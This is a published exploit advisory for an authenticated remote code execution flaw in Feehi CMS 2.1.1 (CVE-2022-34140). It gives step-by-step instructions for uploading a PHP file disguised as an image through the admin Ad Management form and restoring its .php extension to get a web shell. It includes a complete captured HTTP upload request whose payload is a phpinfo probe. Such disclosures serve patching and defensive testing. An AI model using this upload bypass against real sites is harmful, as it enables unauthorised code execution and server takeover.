Feehi CMS 2.1.1 Remote Code Execution

2022.09.25
Credit: yuyudhn
Risk: High
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated) # Date: 22-08-2022 # Exploit Author: yuyudhn # Vendor Homepage: https://feehi.com/ # Software Link: https://github.com/liufee/cms # Version: 2.1.1 (REQUIRED) # Tested on: Linux, Docker # CVE : CVE-2022-34140 # Proof of Concept: 1. Login using admin account at http://feehi-cms.local/admin 2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex 3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate 4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php. 5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php # Burp request example: POST /admin/index.php?r=ad%2Fcreate HTTP/1.1 Host: feehi-cms.local Content-Length: 1530 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://feehi-cms.local Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xg User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://feehi-cms.local/admin/index.php?r=ad%2Fcreate Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; _csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7D Connection: close ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="_csrf_backend" FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg== ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[name]" rce ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[tips]" rce at Ad management ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[input_type]" 1 ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[ad]" ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php" Content-Type: image/png <?php phpinfo(); ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[link]" --------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top